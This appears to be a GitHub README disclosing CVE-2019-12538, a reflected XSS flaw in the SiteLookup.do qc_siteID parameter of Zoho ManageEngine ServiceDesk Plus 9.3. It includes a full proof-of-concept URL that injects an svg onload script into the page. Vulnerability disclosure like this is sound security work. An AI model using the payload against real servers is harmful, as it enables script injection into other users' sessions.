Skip to content
No description, website, or topics provided.
Branch: master
Clone or download
Fetching latest commit…
Cannot retrieve the latest commit at this time.
Permalink
Type Name Latest commit message Commit time
Failed to load latest commit information.
README.md

README.md

CVE-2019-12538 Zoho ManageEngine ServiceDesk Plus 9.3 XSS vulnerability in SiteLookup.do

Information Description: An issue was discovered in Zoho ManageEngine ServiceDesk Plus 9.3. There is XSS via the SiteLookup.do qc_siteID parameter.

Author: Tarantula Team - VinCSS (a member of Vingroup)

Payload

domain/SiteLookup.do?configID=0&SELECTSITE=qc_siteID"/><svg onload=alert('XSS')>&userConfigID=1&SELECTEDSITEID=1&SELECTEDSITENAME=

You can’t perform that action at this time.